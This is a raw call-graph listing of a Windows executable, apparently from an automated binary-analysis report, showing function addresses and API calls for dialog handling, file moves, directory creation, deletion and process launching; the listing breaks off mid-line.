26575->26464 26575->26466 26575->26469 26575->26471 26575->26474 26575->26475 26575->26480 26575->26483 26575->26484 26575->26490 26575->26493 26575->26494 26575->26496 26575->26499 26575->26503 26575->26505 26575->26507 26575->26510 26575->26515 26575->26531 26575->26533 26575->26534 26575->26535 26575->26548 26575->26550 26575->26551 26575->26552 26575->26554 26575->26555 26575->26556 26575->26565 26575->26570 26575->26572 26575->26574 26577 7ff64d328d04 33 API calls 26575->26577 26578 7ff64d32e164 33 API calls 26575->26578 26579 7ff64d32250c SetDlgItemTextW 26575->26579 26581 7ff64d321150 33 API calls 26575->26581 26587 7ff64d32129c 33 API calls 26575->26587 26591 7ff64d34df99 EndDialog 26575->26591 26593 7ff64d3332bc 51 API calls 26575->26593 26595 7ff64d34db21 MoveFileW 26575->26595 26599 7ff64d332f58 56 API calls 26575->26599 27064 7ff64d3413c4 CompareStringW 26575->27064 27065 7ff64d34a440 26575->27065 27141 7ff64d33cfa4 35 API calls _invalid_parameter_noinfo_noreturn 26575->27141 27142 7ff64d3495b4 33 API calls Concurrency::cancel_current_task 26575->27142 27143 7ff64d350684 31 API calls _invalid_parameter_noinfo_noreturn 26575->27143 27144 7ff64d32df4c 47 API calls memcpy_s 26575->27144 27145 7ff64d34a834 33 API calls _invalid_parameter_noinfo_noreturn 26575->27145 27146 7ff64d349518 33 API calls 26575->27146 27147 7ff64d34abe8 33 API calls 3 library calls 26575->27147 27148 7ff64d337368 33 API calls 2 library calls 26575->27148 27149 7ff64d334088 33 API calls 26575->27149 27150 7ff64d3365b0 33 API calls 3 library calls 26575->27150 27151 7ff64d3372cc 26575->27151 27155 7ff64d321744 33 API calls 4 library calls 26575->27155 27156 7ff64d3331bc 26575->27156 27170 7ff64d333ea0 FindClose 26575->27170 27171 7ff64d3413f4 CompareStringW 26575->27171 27172 7ff64d349cd0 47 API calls 26575->27172 27173 7ff64d3487d8 51 API calls 3 library calls 26575->27173 27174 7ff64d34ab54 33 API calls _handle_error 26575->27174 27175 7ff64d337df4 26575->27175 27183 7ff64d335b08 CompareStringW 26575->27183 27184 7ff64d337eb0 47 API calls 26575->27184 26580 7ff64d34ef4e 26576->26580 26577->26575 26578->26575 26579->26575 26584 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26580->26584 26581->26575 26584->26563 26586 7ff64d321fa0 31 API calls 26586->26588 26587->26575 26588->26562 26588->26564 26588->26573 26588->26580 26588->26586 26590 7ff64d3413c4 CompareStringW 26588->26590 26594 7ff64d33d22c 33 API calls 26588->26594 26590->26588 26591->26575 26593->26575 26594->26588 26596 7ff64d34db55 MoveFileExW 26595->26596 26597 7ff64d34db70 26595->26597 26596->26597 26597->26575 26598 7ff64d321fa0 31 API calls 26597->26598 26598->26597 26599->26575 26602 7ff64d34f9a3 26601->26602 26603 7ff64d3220b0 33 API calls 26602->26603 26604 7ff64d34f9b9 26603->26604 26605 7ff64d3220b0 33 API calls 26604->26605 26606 7ff64d34f9ee 26604->26606 26605->26606 27213 7ff64d32e34c 26606->27213 26608 7ff64d34fa4b 27233 7ff64d32e7a8 26608->27233 26612 7ff64d34fa61 26613 7ff64d352320 _handle_error 8 API calls 26612->26613 26614 7ff64d34bc52 26613->26614 26614->26237 28335 7ff64d34849c 26616->28335 26619 7ff64d34f4b7 26621 7ff64d352320 _handle_error 8 API calls 26619->26621 26620 7ff64d34f3c7 GetWindow 26625 7ff64d34f3e2 26620->26625 26622 7ff64d34be9b 26621->26622 26622->26002 26622->26003 26623 7ff64d34f3ee GetClassNameW 28340 7ff64d3413c4 CompareStringW 26623->28340 26625->26619 26625->26623 26626 7ff64d34f496 GetWindow 26625->26626 26627 7ff64d34f417 GetWindowLongPtrW 26625->26627 26626->26619 26626->26625 26627->26626 26628 7ff64d34f429 IsDlgButtonChecked 26627->26628 26628->26626 26629 7ff64d34f445 GetObjectW 26628->26629 28341 7ff64d348504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26629->28341 26631 7ff64d34f461 28342 7ff64d3484cc 26631->28342 28346 7ff64d348df4 16 API calls _handle_error 26631->28346 26634 7ff64d34f479 IsDlgButtonChecked DeleteObject 26634->26626 26636 7ff64d336300 26635->26636 26641 7ff64d33638d 26635->26641 26637 7ff64d3213a4 33 API calls 26636->26637 26638 7ff64d33631b GetCurrentDirectoryW 26637->26638 26639 7ff64d336341 26638->26639 26640 7ff64d3220b0 33 API calls 26639->26640 26642 7ff64d33634f 26640->26642 26641->26013 26642->26641 26643 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26642->26643 26644 7ff64d3363a9 26643->26644 26646 7ff64d322527 26645->26646 26647 7ff64d32252a SetDlgItemTextW 26645->26647 26646->26647 26648 7ff64d38e2e0 26647->26648 26649->26023 26651 7ff64d322516 SetDlgItemTextW 26650->26651 26652 7ff64d322513 26650->26652 26652->26651 26654 7ff64d32139b 26653->26654 26655 7ff64d3212d0 26653->26655 28350 7ff64d322004 33 API calls std::_Xinvalid_argument 26654->28350 26658 7ff64d321396 26655->26658 26659 7ff64d321338 26655->26659 26662 7ff64d3212de memcpy_s 26655->26662 28349 7ff64d321f80 33 API calls 3 library calls 26658->28349 26661 7ff64d3521d0 33 API calls 26659->26661 26659->26662 26661->26662 26662->26058 26663->26094 26665 7ff64d3332bc 51 API calls 26664->26665 26666 7ff64d3332b1 26665->26666 26666->26104 26666->26122 26667->26104 26669 7ff64d3213a4 33 API calls 26668->26669 26670 7ff64d336489 26669->26670 26671 7ff64d33648c GetModuleFileNameW 26670->26671 26674 7ff64d3364dc 26670->26674 26672 7ff64d3364a7 26671->26672 26673 7ff64d3364de 26671->26673 26672->26670 26673->26674 26675 7ff64d32129c 33 API calls 26674->26675 26677 7ff64d336506 26675->26677 26676 7ff64d33653e 26676->26163 26677->26676 26678 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26677->26678 26679 7ff64d336560 26678->26679 26680->26179 26682 7ff64d3220f6 26681->26682 26684 7ff64d3220cb memcpy_s 26681->26684 28351 7ff64d321474 33 API calls 3 library calls 26682->28351 26684->26198 26685->26210 26686->26222 26687->26233 26688->26239 26689->26248 26691 7ff64d353620 26690->26691 26691->26251 26692->26167 26694 7ff64d321177 26693->26694 26695 7ff64d322034 33 API calls 26694->26695 26696 7ff64d321185 memcpy_s 26695->26696 26696->26182 26698 7ff64d322085 26697->26698 26700 7ff64d322059 memcpy_s 26697->26700 28352 7ff64d3215b8 33 API calls 3 library calls 26698->28352 26700->26152 26702 7ff64d352329 26701->26702 26703 7ff64d34c350 26702->26703 26704 7ff64d352550 IsProcessorFeaturePresent 26702->26704 26705 7ff64d352568 26704->26705 28353 7ff64d352744 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 26705->28353 26707 7ff64d35257b 28354 7ff64d352510 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26707->28354 28355 7ff64d35783c 31 API calls 2 library calls 26710->28355 26712 7ff64d35791d 28356 7ff64d357934 16 API calls abort 26712->28356 26715->26203 26716->26273 26717->26295 26718->26310 26719->26322 26745 7ff64d333e28 26720->26745 26724 7ff64d33a589 26751 7ff64d339408 26724->26751 26725 7ff64d33a519 26725->26724 26742 7ff64d33a56a SetDlgItemTextW 26725->26742 26766 7ff64d339800 26725->26766 26728 7ff64d33a603 26730 7ff64d33a60c GetWindowLongPtrW 26728->26730 26731 7ff64d33a6c2 26728->26731 26729 7ff64d33a6f2 GetSystemMetrics GetWindow 26732 7ff64d33a821 26729->26732 26743 7ff64d33a71d 26729->26743 26734 7ff64d38e2c0 26730->26734 26770 7ff64d3395a8 26731->26770 26733 7ff64d352320 _handle_error 8 API calls 26732->26733 26736 7ff64d33a830 26733->26736 26737 7ff64d33a6aa GetWindowRect 26734->26737 26736->26335 26737->26731 26740 7ff64d33a6e5 SetDlgItemTextW 26740->26729 26741 7ff64d33a73e GetWindowRect 26741->26743 26742->26725 26743->26732 26743->26741 26744 7ff64d33a800 GetWindow 26743->26744 26744->26732 26744->26743 26746 7ff64d333e4d _snwprintf 26745->26746 26779 7ff64d359ef0 26746->26779 26749 7ff64d340f68 WideCharToMultiByte 26750 7ff64d340faa 26749->26750 26750->26725 26752 7ff64d3395a8 47 API calls 26751->26752 26754 7ff64d33944f 26752->26754 26753 7ff64d352320 _handle_error 8 API calls 26755 7ff64d33958e GetWindowRect GetClientRect 26753->26755 26756 7ff64d32129c 33 API calls 26754->26756 26765 7ff64d33955a 26754->26765 26755->26728 26755->26729 26757 7ff64d33949c 26756->26757 26758 7ff64d3395a1 26757->26758 26760 7ff64d32129c 33 API calls 26757->26760 26759 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26758->26759 26761 7ff64d3395a7 26759->26761 26762 7ff64d339514 26760->26762 26763 7ff64d33959c 26762->26763 26762->26765 26764 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26763->26764 26764->26758 26765->26753 26767 7ff64d339840 26766->26767 26769 7ff64d339869 26766->26769 26811 7ff64d35a270 31 API calls 2 library calls 26767->26811 26769->26725 26771 7ff64d333e28 swprintf 46 API calls 26770->26771 26772 7ff64d3395eb 26771->26772 26773 7ff64d340f68 WideCharToMultiByte 26772->26773 26774 7ff64d339603 26773->26774 26775 7ff64d339800 31 API calls 26774->26775 26776 7ff64d33961b 26775->26776 26777 7ff64d352320 _handle_error 8 API calls 26776->26777 26778 7ff64d33962b 26777->26778 26778->26729 26778->26740 26780 7ff64d359f36 26779->26780 26781 7ff64d359f4e 26779->26781 26806 7ff64d35d69c 15 API calls abort 26780->26806 26781->26780 26783 7ff64d359f58 26781->26783 26808 7ff64d357ef0 35 API calls 2 library calls 26783->26808 26784 7ff64d359f3b 26807 7ff64d3578e4 31 API calls _invalid_parameter_noinfo_noreturn 26784->26807 26787 7ff64d352320 _handle_error 8 API calls 26789 7ff64d333e69 26787->26789 26788 7ff64d359f69 memcpy_s 26809 7ff64d357e70 15 API calls memcpy_s 26788->26809 26789->26749 26791 7ff64d359fd4 26810 7ff64d3582f8 46 API calls 3 library calls 26791->26810 26793 7ff64d359fdd 26794 7ff64d359fe5 26793->26794 26795 7ff64d35a014 26793->26795 26796 7ff64d35d90c __free_lconv_mon 15 API calls 26794->26796 26797 7ff64d35a06c 26795->26797 26798 7ff64d35a023 26795->26798 26799 7ff64d35a092 26795->26799 26803 7ff64d35a01a 26795->26803 26805 7ff64d359f46 26796->26805 26800 7ff64d35d90c __free_lconv_mon 15 API calls 26797->26800 26802 7ff64d35d90c __free_lconv_mon 15 API calls 26798->26802 26799->26797 26801 7ff64d35a09c 26799->26801 26800->26805 26804 7ff64d35d90c __free_lconv_mon 15 API calls 26801->26804 26802->26805 26803->26797 26803->26798 26804->26805 26805->26787 26806->26784 26807->26805 26808->26788 26809->26791 26810->26793 26811->26769 26824 7ff64d3213a4 26812->26824 26815 7ff64d322494 26816 7ff64d32129c 33 API calls 26815->26816 26817 7ff64d3224a2 26816->26817 26818 7ff64d3224dd 26817->26818 26820 7ff64d322505 26817->26820 26819 7ff64d352320 _handle_error 8 API calls 26818->26819 26821 7ff64d3224f3 26819->26821 26822 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26820->26822 26821->26344 26823 7ff64d32250a 26822->26823 26825 7ff64d3213ad 26824->26825 26833 7ff64d32142d GetWindowTextW 26824->26833 26826 7ff64d32143d 26825->26826 26827 7ff64d3213ce 26825->26827 26844 7ff64d322018 33 API calls std::_Xinvalid_argument 26826->26844 26831 7ff64d3213db memcpy_s 26827->26831 26834 7ff64d3521d0 26827->26834 26843 7ff64d32197c 31 API calls _invalid_parameter_noinfo_noreturn 26831->26843 26833->26815 26835 7ff64d3521db 26834->26835 26836 7ff64d3521f4 26835->26836 26837 7ff64d35bbc0 abort 2 API calls 26835->26837 26839 7ff64d3521fa 26835->26839 26836->26831 26837->26835 26838 7ff64d352205 26846 7ff64d321f80 33 API calls 3 library calls 26838->26846 26839->26838 26845 7ff64d352f7c RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc std::_Xinvalid_argument 26839->26845 26842 7ff64d35220b 26843->26833 26845->26838 26846->26842 26847->26361 26849->26369 26857 7ff64d339638 26850->26857 26853 7ff64d3397d9 26855 7ff64d352320 _handle_error 8 API calls 26853->26855 26854 7ff64d339800 31 API calls 26854->26853 26856 7ff64d3397f2 26855->26856 26856->26381 26856->26382 26858 7ff64d339692 26857->26858 26866 7ff64d339730 26857->26866 26859 7ff64d3396c0 26858->26859 26860 7ff64d340f68 WideCharToMultiByte 26858->26860 26863 7ff64d3396ef 26859->26863 26867 7ff64d33aa88 45 API calls _snwprintf 26859->26867 26860->26859 26861 7ff64d352320 _handle_error 8 API calls 26862 7ff64d339764 26861->26862 26862->26853 26862->26854 26868 7ff64d35a270 31 API calls 2 library calls 26863->26868 26866->26861 26867->26863 26868->26866 26885 7ff64d33d4d0 26869->26885 26873 7ff64d359ef0 swprintf 46 API calls 26874 7ff64d33d8e5 _snwprintf 26873->26874 26874->26873 26877 7ff64d33d974 26874->26877 26899 7ff64d329d78 33 API calls 26874->26899 26876 7ff64d33da17 26879 7ff64d352320 _handle_error 8 API calls 26876->26879 26878 7ff64d33d9a3 26877->26878 26900 7ff64d329d78 33 API calls 26877->26900 26878->26876 26880 7ff64d33da3f 26878->26880 26881 7ff64d33da2b 26879->26881 26882 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26880->26882 26881->26387 26883 7ff64d33da44 26882->26883 26886 7ff64d33d665 26885->26886 26888 7ff64d33d502 26885->26888 26889 7ff64d33cb80 26886->26889 26887 7ff64d321744 33 API calls 26887->26888 26888->26886 26888->26887 26891 7ff64d33cbb6 26889->26891 26896 7ff64d33cc80 26889->26896 26893 7ff64d33cc7b 26891->26893 26894 7ff64d33cc20 26891->26894 26897 7ff64d33cbc6 26891->26897 26901 7ff64d321f80 33 API calls 3 library calls 26893->26901 26894->26897 26898 7ff64d3521d0 33 API calls 26894->26898 26902 7ff64d322004 33 API calls std::_Xinvalid_argument 26896->26902 26897->26874 26898->26897 26899->26874 26900->26878 26901->26896 26904 7ff64d34ae3c GetMessageW 26903->26904 26905 7ff64d34ae80 GetDlgItem 26903->26905 26906 7ff64d34ae6a TranslateMessage DispatchMessageW 26904->26906 26907 7ff64d34ae5b IsDialogMessageW 26904->26907 26905->26390 26905->26391 26906->26905 26907->26905 26907->26906 26910 7ff64d3336b3 26908->26910 26909 7ff64d3336e0 26928 7ff64d3332bc 26909->26928 26910->26909 26911 7ff64d3336cc CreateDirectoryW 26910->26911 26911->26909 26916 7ff64d33377d 26911->26916 26914 7ff64d333791 GetLastError 26915 7ff64d33378d 26914->26915 26920 7ff64d352320 _handle_error 8 API calls 26915->26920 26916->26915 27015 7ff64d333d34 26916->27015 26923 7ff64d3337b9 26920->26923 26921 7ff64d33373b 26924 7ff64d333774 26921->26924 26925 7ff64d3337ce 26921->26925 26922 7ff64d333720 CreateDirectoryW 26922->26921 26923->26409 26924->26914 26924->26916 26926 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26925->26926 26927 7ff64d3337d3 26926->26927 26929 7ff64d3332e7 GetFileAttributesW 26928->26929 26930 7ff64d3332e4 26928->26930 26931 7ff64d3332f8 26929->26931 26938 7ff64d333375 26929->26938 26930->26929 26932 7ff64d336a0c 49 API calls 26931->26932 26934 7ff64d33331f 26932->26934 26933 7ff64d352320 _handle_error 8 API calls 26935 7ff64d333389 26933->26935 26936 7ff64d33333c 26934->26936 26937 7ff64d333323 GetFileAttributesW 26934->26937 26935->26914 26942 7ff64d336a0c 26935->26942 26936->26938 26939 7ff64d333399 26936->26939 26937->26936 26938->26933 26940 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26939->26940 26941 7ff64d33339e 26940->26941 26943 7ff64d336a4b 26942->26943 26963 7ff64d336a44 26942->26963 26946 7ff64d32129c 33 API calls 26943->26946 26944 7ff64d352320 _handle_error 8 API calls 26945 7ff64d33371c 26944->26945 26945->26921 26945->26922 26947 7ff64d336a76 26946->26947 26948 7ff64d336a96 26947->26948 26949 7ff64d336cc7 26947->26949 26951 7ff64d336ab0 26948->26951 26977 7ff64d336b49 26948->26977 26950 7ff64d3362dc 35 API calls 26949->26950 26954 7ff64d336ce6 26950->26954 26952 7ff64d3370ab 26951->26952 27029 7ff64d32c098 33 API calls 2 library calls 26951->27029 27037 7ff64d322004 33 API calls std::_Xinvalid_argument 26952->27037 26955 7ff64d336eef 26954->26955 26959 7ff64d336d1b 26954->26959 26961 7ff64d336b44 26954->26961 26958 7ff64d3370cf 26955->26958 27034 7ff64d32c098 33 API calls 2 library calls 26955->27034 26956 7ff64d3370b1 26968 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26956->26968 27040 7ff64d322004 33 API calls std::_Xinvalid_argument 26958->27040 26966 7ff64d3370bd 26959->26966 27032 7ff64d32c098 33 API calls 2 library calls 26959->27032 26960 7ff64d3370d5 26969 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26960->26969 26961->26956 26961->26960 26961->26963 26970 7ff64d3370a6 26961->26970 26963->26944 26964 7ff64d336b03 26978 7ff64d321fa0 31 API calls 26964->26978 26982 7ff64d336b15 memcpy_s 26964->26982 27038 7ff64d322004 33 API calls std::_Xinvalid_argument 26966->27038 26975 7ff64d3370b7 26968->26975 26976 7ff64d3370db 26969->26976 26974 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26970->26974 26971 7ff64d336f56 27035 7ff64d3211cc 33 API calls memcpy_s 26971->27035 26973 7ff64d321fa0 31 API calls 26973->26961 26974->26952 26985 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26975->26985 26987 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26976->26987 26977->26961 26981 7ff64d32129c 33 API calls 26977->26981 26978->26982 26980 7ff64d3370c3 26984 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 26980->26984 26988 7ff64d336bbe 26981->26988 26982->26973 26983 7ff64d336f69 27036 7ff64d3357ac 33 API calls memcpy_s 26983->27036 26990 7ff64d3370c9 26984->26990 26985->26966 26986 7ff64d321fa0 31 API calls 26992 7ff64d336df5 26986->26992 26993 7ff64d3370e1 26987->26993 27030 7ff64d335820 33 API calls 26988->27030 27039 7ff64d32704c 47 API calls memcpy_s 26990->27039 26991 7ff64d336d76 memcpy_s 26991->26980 26991->26986 27001 7ff64d336e21 26992->27001 27033 7ff64d321744 33 API calls 4 library calls 26992->27033 26995 7ff64d336bd3 27031 7ff64d32e164 33 API calls 2 library calls 26995->27031 26996 7ff64d336f79 memcpy_s 26996->26976 26999 7ff64d321fa0 31 API calls 26996->26999 27000 7ff64d336fec 26999->27000 27002 7ff64d321fa0 31 API calls 27000->27002 27001->26990 27007 7ff64d32129c 33 API calls 27001->27007 27006 7ff64d336ff6 27002->27006 27003 7ff64d336be9 memcpy_s 27003->26975 27005 7ff64d321fa0 31 API calls 27003->27005 27008 7ff64d336c6d 27005->27008 27009 7ff64d321fa0 31 API calls 27006->27009 27010 7ff64d336ec2 27007->27010 27011 7ff64d321fa0 31 API calls 27008->27011 27009->26961 27012 7ff64d322034 33 API calls 27010->27012 27011->26961 27013 7ff64d336edf 27012->27013 27014 7ff64d321fa0 31 API calls 27013->27014 27014->26961 27016 7ff64d333d5b 27015->27016 27017 7ff64d333d5e SetFileAttributesW 27015->27017 27016->27017 27018 7ff64d333d74 27017->27018 27026 7ff64d333df5 27017->27026 27020 7ff64d336a0c 49 API calls 27018->27020 27019 7ff64d352320 _handle_error 8 API calls 27021 7ff64d333e0a 27019->27021 27022 7ff64d333d99 27020->27022 27021->26915 27023 7ff64d333dbc 27022->27023 27024 7ff64d333d9d SetFileAttributesW 27022->27024 27025 7ff64d333e1a 27023->27025 27023->27026 27024->27023 27027 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27025->27027 27026->27019 27028 7ff64d333e1f 27027->27028 27029->26964 27030->26995 27031->27003 27032->26991 27033->27001 27034->26971 27035->26983 27036->26996 27039->26958 27042 7ff64d327206 27041->27042 27043 7ff64d32713b 27041->27043 27051 7ff64d32704c 47 API calls memcpy_s 27042->27051 27049 7ff64d32714b memcpy_s 27043->27049 27050 7ff64d323f48 33 API calls 2 library calls 27043->27050 27046 7ff64d32720b 27047 7ff64d327273 27046->27047 27052 7ff64d32889c 8 API calls memcpy_s 27046->27052 27047->26425 27049->26425 27050->27049 27051->27046 27052->27046 27054 7ff64d332102 27053->27054 27055 7ff64d3320ea 27053->27055 27056 7ff64d332126 27054->27056 27059 7ff64d32b544 99 API calls 27054->27059 27055->27054 27057 7ff64d3320f6 FindCloseChangeNotification 27055->27057 27056->26449 27057->27054 27059->27056 27061 7ff64d34aa2f 27060->27061 27062 7ff64d34aa36 27060->27062 27061->26575 27062->27061 27200 7ff64d321744 33 API calls 4 library calls 27062->27200 27064->26575 27066 7ff64d34a706 27065->27066 27067 7ff64d34a47f 27065->27067 27069 7ff64d352320 _handle_error 8 API calls 27066->27069 27201 7ff64d34cdf8 33 API calls 27067->27201 27070 7ff64d34a717 27069->27070 27070->26530 27071 7ff64d34a49e 27072 7ff64d32129c 33 API calls 27071->27072 27073 7ff64d34a4de 27072->27073 27074 7ff64d32129c 33 API calls 27073->27074 27075 7ff64d34a517 27074->27075 27076 7ff64d32129c 33 API calls 27075->27076 27077 7ff64d34a54a 27076->27077 27202 7ff64d34a834 33 API calls _invalid_parameter_noinfo_noreturn 27077->27202 27079 7ff64d34a734 27081 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27079->27081 27080 7ff64d34a573 27080->27079 27082 7ff64d34a73a 27080->27082 27084 7ff64d34a740 27080->27084 27085 7ff64d3220b0 33 API calls 27080->27085 27088 7ff64d34a685 27080->27088 27081->27082 27083 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27082->27083 27083->27084 27086 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27084->27086 27085->27088 27087 7ff64d34a746 27086->27087 27090 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27087->27090 27088->27066 27088->27087 27089 7ff64d34a72f 27088->27089 27091 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27089->27091 27092 7ff64d34a74c 27090->27092 27091->27079 27093 7ff64d32255c 61 API calls 27092->27093 27094 7ff64d34a795 27093->27094 27095 7ff64d34a7b1 27094->27095 27096 7ff64d34a801 SetDlgItemTextW 27094->27096 27100 7ff64d34a7a1 27094->27100 27097 7ff64d352320 _handle_error 8 API calls 27095->27097 27096->27095 27098 7ff64d34a827 27097->27098 27098->26530 27099 7ff64d34a7ad 27099->27095 27101 7ff64d34a7b7 EndDialog 27099->27101 27100->27095 27100->27099 27203 7ff64d33bb00 102 API calls 27100->27203 27101->27095 27104 7ff64d34f87d 27103->27104 27109 7ff64d34f529 memcpy_s 27103->27109 27105 7ff64d321fa0 31 API calls 27104->27105 27106 7ff64d34f89c 27105->27106 27107 7ff64d352320 _handle_error 8 API calls 27106->27107 27108 7ff64d34f8a8 27107->27108 27108->26541 27110 7ff64d34f684 27109->27110 27204 7ff64d3413c4 CompareStringW 27109->27204 27112 7ff64d32129c 33 API calls 27110->27112 27113 7ff64d34f6c0 27112->27113 27114 7ff64d3332a8 51 API calls 27113->27114 27115 7ff64d34f6ca 27114->27115 27116 7ff64d321fa0 31 API calls 27115->27116 27118 7ff64d34f6d5 27116->27118 27117 7ff64d34f742 ShellExecuteExW 27121 7ff64d34f846 27117->27121 27124 7ff64d34f755 27117->27124 27118->27117 27120 7ff64d32129c 33 API calls 27118->27120 27119 7ff64d34f78e 27206 7ff64d34fe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 27119->27206 27125 7ff64d34f717 27120->27125 27121->27104 27122 7ff64d34f8fb 27121->27122 27126 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27122->27126 27123 7ff64d34f7e3 CloseHandle 27127 7ff64d34f7f2 27123->27127 27128 7ff64d34f801 27123->27128 27124->27119 27124->27123 27132 7ff64d34f781 ShowWindow 27124->27132 27205 7ff64d335b60 53 API calls 2 library calls 27125->27205 27130 7ff64d34f900 27126->27130 27207 7ff64d3413c4 CompareStringW 27127->27207 27128->27121 27138 7ff64d34f837 ShowWindow 27128->27138 27132->27119 27134 7ff64d34f725 27135 7ff64d321fa0 31 API calls 27134->27135 27137 7ff64d34f72f 27135->27137 27136 7ff64d34f7a6 27136->27123 27139 7ff64d34f7b4 GetExitCodeProcess 27136->27139 27137->27117 27138->27121 27139->27123 27140 7ff64d34f7c7 27139->27140 27140->27123 27141->26575 27142->26575 27143->26575 27144->26575 27145->26575 27146->26575 27147->26575 27148->26575 27149->26575 27150->26575 27152 7ff64d3372ea 27151->27152 27208 7ff64d32b3a8 27152->27208 27155->26575 27157 7ff64d3331e7 DeleteFileW 27156->27157 27158 7ff64d3331e4 27156->27158 27159 7ff64d3331fd 27157->27159 27166 7ff64d33327c 27157->27166 27158->27157 27161 7ff64d336a0c 49 API calls 27159->27161 27160 7ff64d352320 _handle_error 8 API calls 27162 7ff64d333291 27160->27162 27163 7ff64d333222 27161->27163 27162->26575 27164 7ff64d333226 DeleteFileW 27163->27164 27165 7ff64d333243 27163->27165 27164->27165 27165->27166 27167 7ff64d3332a1 27165->27167 27166->27160 27168 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27167->27168 27169 7ff64d3332a6 27168->27169 27171->26575 27172->26575 27173->26575 27174->26575 27176 7ff64d337e0c 27175->27176 27177 7ff64d337e55 27176->27177 27178 7ff64d337e23 27176->27178 27212 7ff64d32704c 47 API calls memcpy_s 27177->27212 27180 7ff64d32129c 33 API calls 27178->27180 27182 7ff64d337e47 27180->27182 27181 7ff64d337e5a 27182->26575 27183->26575 27184->26575 27187 7ff64d33d25e 27185->27187 27186 7ff64d33d292 27186->26588 27187->27186 27188 7ff64d321744 33 API calls 27187->27188 27188->27187 27189->26489 27190->26479 27192->26459 27193->26462 27194->26464 27195->26518 27196->26506 27198->26509 27200->27062 27201->27071 27202->27080 27203->27099 27204->27110 27205->27134 27206->27136 27207->27128 27211 7ff64d32b3f2 memcpy_s 27208->27211 27209 7ff64d352320 _handle_error 8 API calls 27210 7ff64d32b4b6 27209->27210 27210->26575 27211->27209 27212->27181 27269 7ff64d3386ec 27213->27269 27215 7ff64d32e3c4 27275 7ff64d32e600 27215->27275 27217 7ff64d32e4d4 27220 7ff64d3521d0 33 API calls 27217->27220 27218 7ff64d32e549 27221 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27218->27221 27219 7ff64d32e454 27219->27217 27219->27218 27222 7ff64d32e4f0 27220->27222 27230 7ff64d32e54e 27221->27230 27281 7ff64d343148 102 API calls 27222->27281 27224 7ff64d32e51d 27225 7ff64d352320 _handle_error 8 API calls 27224->27225 27227 7ff64d32e52d 27225->27227 27226 7ff64d3318c2 27228 7ff64d33190d 27226->27228 27231 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27226->27231 27227->26608 27228->26608 27229 7ff64d321fa0 31 API calls 27229->27230 27230->27226 27230->27228 27230->27229 27232 7ff64d33193b 27231->27232 27234 7ff64d32e7ea 27233->27234 27236 7ff64d32e864 27234->27236 27237 7ff64d32e8a1 27234->27237 27282 7ff64d333ec8 27234->27282 27236->27237 27238 7ff64d32e993 27236->27238 27245 7ff64d32e900 27237->27245 27289 7ff64d32f578 27237->27289 27239 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27238->27239 27242 7ff64d32e998 27239->27242 27240 7ff64d32e955 27241 7ff64d352320 _handle_error 8 API calls 27240->27241 27244 7ff64d32e97e 27241->27244 27247 7ff64d32e578 27244->27247 27245->27240 27325 7ff64d3228a4 82 API calls 2 library calls 27245->27325 28321 7ff64d3315d8 27247->28321 27250 7ff64d32e59e 27251 7ff64d321fa0 31 API calls 27250->27251 27253 7ff64d32e5b7 27251->27253 27252 7ff64d341870 108 API calls 27252->27250 27254 7ff64d321fa0 31 API calls 27253->27254 27255 7ff64d32e5c3 27254->27255 27256 7ff64d321fa0 31 API calls 27255->27256 27257 7ff64d32e5cf 27256->27257 27258 7ff64d33878c 108 API calls 27257->27258 27259 7ff64d32e5db 27258->27259 27260 7ff64d321fa0 31 API calls 27259->27260 27261 7ff64d32e5e4 27260->27261 27262 7ff64d321fa0 31 API calls 27261->27262 27266 7ff64d32e5ed 27262->27266 27263 7ff64d3318c2 27264 7ff64d33190d 27263->27264 27267 7ff64d357904 _invalid_parameter_noinfo_noreturn 31 API calls 27263->27267 27264->26612 27265 7ff64d321fa0 31 API calls 27265->27266 27266->27263 27266->27264 27266->27265 27268 7ff64d33193b 27267->27268 27270 7ff64d33870a 27269->27270 27271 7ff64d3521d0 33 API calls 27270->27271 27272 7ff64d33872f 27271->27272 27273 7ff64d3521d0 33 API calls 27272->27273 27274 7ff64d338759 27273->27274 27274->27215 27276 7ff64d32e627 27275->27276 27278 7ff64d32e62c memcpy_s 27275->27278 27277 7ff64d321fa0 31 API calls 27276->27277 27277->27278 27279 7ff64d321fa0 31 API calls 27278->27279 27280 7ff64d32e668 memcpy_s 27278->27280 27279->27280 27280->27219 27281->27224 27283 7ff64d3372cc 8 API calls 27282->27283 27284 7ff64d333ee1 27283->27284 27285 7ff64d333f0f 27284->27285 27326 7ff64d3340bc 27284->27326 27285->27234 27288 7ff64d333efa FindClose 27288->27285 27290 7ff64d32f598 _snwprintf 27289->27290 27365 7ff64d322950 27290->27365 27293 7ff64d32f5cc 27297 7ff64d32f5fc 27293->27297 27380 7ff64d3233e4 27293->27380 27296 